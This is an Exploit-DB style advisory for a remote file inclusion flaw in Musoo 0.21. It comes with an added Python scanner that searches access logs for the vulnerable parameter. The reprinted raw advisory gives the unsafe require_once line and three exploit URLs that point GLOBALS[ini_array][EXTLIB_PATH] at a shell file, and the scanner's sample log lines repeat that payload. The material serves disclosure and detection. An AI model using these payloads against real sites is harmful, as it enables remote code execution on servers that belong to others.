vendor: Musoo
by: GoLd_M
CVSS: N/A
N/A
CWE: Remote File Include
Product Name: Musoo
Affected Version From: 0.21
Affected Version To: 0.21
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Musoo 0.21 (GLOBALS[ini_array][EXTLIB_PATH]) Remote File Include

Musoo 0.21 is vulnerable to remote file inclusion. The vulnerability exists in the files 'msDb.php', 'MusooTemplateLite.php', and 'SoundImporter.php'. An attacker can exploit it by manipulating the 'GLOBALS[ini_array][EXTLIB_PATH]' parameter in the URL to include a malicious file. The advisory text provides three exploits, each targeting a different file.

Mitigation:

The vendor should release a patch to fix the remote file inclusion vulnerability in the affected files. Users are advised to update to the latest version of Musoo to mitigate this issue.
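
Since the entry lists no patch, one defensive check is to search web server access logs for requests that carry the advisory's parameter against the three affected scripts. The following is an added example, not part of the original advisory or of Musoo; the common/combined log format, the label names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Scripts the advisory names as containing the vulnerable require_once().
AFFECTED = ("/msDb.php", "/modules/MusooTemplateLite.php",
            "/modules/SoundImporter.php")
PARAM = "GLOBALS[ini_array][EXTLIB_PATH]"
# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode(text, rounds=3):
    """Percent-decode repeatedly so %5B and %255B both become '['."""
    for _ in range(rounds):
        once = unquote(text)
        if once == text:
            break
        text = once
    return text

def classify(line):
    """Return 'musoo-extlib-path', 'globals-override', or None for a log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    # Split on the raw separators first, then decode each parameter name.
    names = [decode(p.split("=", 1)[0]).strip()
             for p in re.split("[&;]", query) if p]
    if not any(n.startswith("GLOBALS[") for n in names):
        return None
    if PARAM in names and decode(path).endswith(AFFECTED):
        return "musoo-extlib-path"
    # Any other GLOBALS[...] request parameter still deserves an analyst's look.
    return "globals-override"

def scan(lines):
    """Return (line_number, label) for every flagged line."""
    return [(n, label) for n, line in enumerate(lines, 1)
            if (label := classify(line))]

# Constructed sample lines (documentation addresses and hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jun/2007:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Jun/2007:10:01:09 +0000] "GET /msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://files.example.test/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [20/Jun/2007:10:01:11 +0000] "GET /modules/SoundImporter.php?GLOBALS%5Bini_array%5D%5BEXTLIB_PATH%5D=http://files.example.test/x.txt%3F HTTP/1.0" 200 298',
    '203.0.113.4 - - [20/Jun/2007:10:02:30 +0000] "GET /other.php?a=1&GLOBALS[cfg]=1 HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(number, label)
```

The parameter name is matched case-sensitively because PHP variable names are case-sensitive; a hit labelled `globals-override` on an unrelated script is a separate finding to triage, not evidence of this specific issue.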
Source

Exploit-DB raw data:

# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include

# D.Script: 
      http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz

# V.Code :
      require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/

# In :
      /msDb.php
      /modules/MusooTemplateLite.php
      /modules/SoundImporter.php

# Exploits:
      1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?

# Video
      http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar

# Discovered by: 
      GoLd_M = [Mahmood_ali]

# Homepage: 
      http://www.Tryag.Com/cc

# Sp.Thanx To : 
      Tryag-Team & Asb-May's Team 

# milw0rm.com [2007-06-20]